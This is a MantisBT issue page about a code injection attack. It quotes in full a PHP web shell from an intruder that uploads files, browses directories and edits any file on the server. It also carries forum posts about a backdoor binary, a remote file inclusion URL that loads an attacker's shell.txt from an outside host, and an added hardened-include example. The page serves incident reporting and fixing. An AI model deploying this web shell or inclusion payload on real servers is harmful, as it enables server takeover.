View Issue Details

ID: 0006629
Project: mantisbt
Category: security
View Status: public
Last Update: 2006-10-09 11:55
Reporter: thraxisp
Assigned To: thraxisp
Priority: normal
Severity: minor
Reproducibility: always
Status: closed
Resolution: fixed
Product Version: 1.0.0a2
Fixed in Version: 1.1.0a1
Summary: 0006629: Port: code injection
Description

Mantis was hacked with:
Re: Code injection security issue? Site hacked!
Here is the script from the intruders' site, actually an upload form

<title>#ProxyClub TOOLS</title>
<head>
<style>
input{
background-color: #615263;
color: white;
border: 1px;
}
UNKNOWN {
COLOR: white;
TEXT-DECORATION: none
}
A:link {
COLOR: white;
TEXT-DECORATION: none
}
A:hover {
COLOR: red;
TEXT-DECORATION: none
}
A:active {
COLOR: white;
TEXT-DECORATION: none
}
A:visited {
TEXT-DECORATION: none
}
</style>
</head>
<body bgcolor=black vlink=white><font color=white face=verdana size=1>
<?
$whereme=getcwd();
$php_self=$_SERVER['PHP_SELF'];
$dirname=$_GET['dirname'];
if($dirname==""){$dirname=$whereme;}
$dirname=str_replace("\\","\",$dirname);
$filename=str_replace("\\","\",$filename);
?>
Script dir: <?=$whereme?>


File upload:

<form enctype="multipart/form-data" method=post> <!-- v1.1 -->
<input type=file name=text size=30>

<input name=where size=30 value='<?=$whereme?>'>

<input type=submit value=Upload name=makeup>
</form>

Dir content (<font color=green>W - Writable :: <font color=red> R - Read only</font></font>)

<form method=post>
<input name=dirname size=30 value='<?=$dirname?>'>

<?=$whereme?>
</form>

Show/edit/create file content:

<form method=post>
<input name=filename size=30 value='<?=$dirname?>'>

<?=$filename?>
</form>

<?
$text=$_POST['text'];
$where=$_POST['where'];
$makeup=$_POST['makeup'];

if($makeup){
$uploadfile = "$where/".$_FILES['text']['name'];
if (move_uploaded_file($_FILES['text']['tmp_name'], $uploadfile)) {
$where=str_replace("\\","\",$where);
echo "
Uploaded to $where

";
}else{
echo "
Error

";}
}

print "
<font color=red>[D] - Directory</font>

";

$dh = opendir($dirname);
while (!(($file = readdir($dh)) === false)) {
if (is_dir("$dirname/$file")) {

echo "[D]<font size=2 face=verdana color=red>";
echo "";
echo "</font>";

}
$fz=filesize("$dirname/$file");
if(is_writable("$dirname/$file")) {print "<font size=2 face=verdana color=green>W - </font>";}else{print "<font size=2 face=verdana color=red>R - </font>";}
print "<font size=2 face=verdana>$file
- <font size=1>$fz Bytes</font>
\r\n";

}
closedir($dh);

print "

";

$filename=$_POST['filename'];
if($filename){

$fd = @fopen ($filename, "r");
$cont3nt = @fread ($fd, @filesize ($filename));
print "
<form method=post>
<input name=filez type=hidden value='$filename'> <!-- v1.1 -->
<textarea name=filecontent rows=25 cols=100>$cont3nt</textarea>

<input type=submit name=save value='Save changes'>
</form>

";
}
$save=$_POST['save'];
$filecontent=$_POST['filecontent'];
$filez=$_POST['filez'];
if($save){
$filecontent = stripslashes($filecontent);
$fp=@fopen("$filez", "w+");
fwrite($fp,"$filecontent");
print "Success edited";
}
?>

<center><center>o...#ProxyClub HACK TEAM Tools :: <a href=http://limpompo.nm.ru target=_blank>limpompo.nm.ru</a>...o</center>
<!-- #ProxyClub HACK TEAM -->
Anonymous
Posted on: 2005/7/19 17:24

Careful: possibly a rootkit installed.
Besides the s.txt there is a r0nin file, which is a Linux binary. Opened with a hex editor, at offset 1680 you can read the line "PsychoPhobia Backdoor is starting". The Perl script loads this binary and forks a new process; it tries to open several ports, also ftp 21, 22 and sftp 143.


Anonymous
Posted on: 2005/7/19 17:51

Solution
I solved my own intrusion problem.

The problem here seems to be in php.ini, when
register_globals = ON
which is not necessary in version 1.2.2 any more, is it?

In that case, the line
include_once("$CLPATH/mcconfig.php");

in clmcpreload.php

will execute shell.txt by the command

http://www.natsim.net/learnlinc/clmcpreload.php?CLPATH=http://www.geocities.com/limpompo2004/shell.txt?

because $CLPATH is overridden with the obscure URL where the
question mark at the end discards "/mcconfig.php"

This way the hackers can load their upload form or whatever script they want!

Regards,
Frank
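The include pattern Frank describes, shown beside a hardened replacement, as an added example written for this page: it is not MantisBT code and not the clmcpreload.php from the thread. The file name mcconfig.php and the CLPATH variable come from the thread; CL_BASE_DIR, safe_include(), risky_ini_settings() and the "config lives beside the script" layout are assumptions made for the example.

```php
<?php
// Added example (not MantisBT code, not the thread's clmcpreload.php).
// Demonstrates why include_once("$CLPATH/mcconfig.php") is exploitable under
// register_globals and how to anchor an include to a fixed local directory.

// --- Vulnerable pattern (as described in the thread) --------------------
// With register_globals = On, the request parameter ?CLPATH=... becomes the
// PHP variable $CLPATH, so the include path is attacker-controlled. With
// allow_url_fopen / allow_url_include enabled, PHP will fetch and execute a
// remote file. Kept here only to show the defect; do not deploy it.
function vulnerable_include(): void
{
    global $CLPATH;                      // filled from the request under register_globals
    include_once("$CLPATH/mcconfig.php");
}

// --- Hardened replacement --------------------------------------------------
// 1. Never derive an include path from request data; anchor it to the
//    script's own directory with a constant.
// 2. Resolve the final path with realpath() and confirm it stays inside the
//    allowed base directory, so "../" and stream wrappers (http://, php://)
//    cannot escape.
// 3. Require the target to exist as a regular local file before including it.
define('CL_BASE_DIR', __DIR__);          // assumption: config lives beside this script

function safe_include(string $relative): bool
{
    // Reject anything that is not a plain relative file name.
    if (!preg_match('#^[A-Za-z0-9_./-]+$#', $relative) || strpos($relative, '..') !== false) {
        return false;
    }
    $candidate = realpath(CL_BASE_DIR . '/' . $relative);
    $base      = realpath(CL_BASE_DIR);
    if ($candidate === false || $base === false) {
        return false;                    // file does not exist locally, or base is invalid
    }
    // realpath() has already dropped wrappers and symlinks; enforce the boundary.
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    if (!is_file($candidate)) {
        return false;
    }
    include_once $candidate;
    return true;
}

// --- Configuration review for the host ------------------------------------
// Returns the php.ini directives that made the thread's attack possible so an
// administrator can check them: register_globals and allow_url_include should
// both be Off.
function risky_ini_settings(): array
{
    $flags = [];
    foreach (['register_globals', 'allow_url_include', 'allow_url_fopen'] as $key) {
        $value = ini_get($key);
        // ini_get() returns false when the directive no longer exists
        // (register_globals was removed in PHP 5.4).
        if ($value === false) {
            $flags[$key] = 'not present';
        } else {
            $flags[$key] = filter_var($value, FILTER_VALIDATE_BOOLEAN) ? 'On' : 'Off';
        }
    }
    return $flags;
}

// Usage: include the config the safe way and report the ini state.
if (!safe_include('mcconfig.php')) {
    error_log('mcconfig.php missing or outside ' . CL_BASE_DIR);
}
print_r(risky_ini_settings());
```

The boundary check relies on realpath() returning false for anything that is not an existing local path, which is what stops a URL such as the one in the thread from ever reaching include_once; the ini review is there because the thread's fix (turning register_globals off) is a host setting, not a code change, and should be verified on every server the application is deployed to.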

Tags: No tags attached.

Relationships

child of 0006436 (closed, thraxisp): code injection

Activities

thraxisp (reporter), 2006-01-23 22:51, note ~0012008

Fixed 3 holes in CVS.

core/filter_api.php -> 1.136
view_all_inc.php -> 1.163
my_view_page.php -> 1.13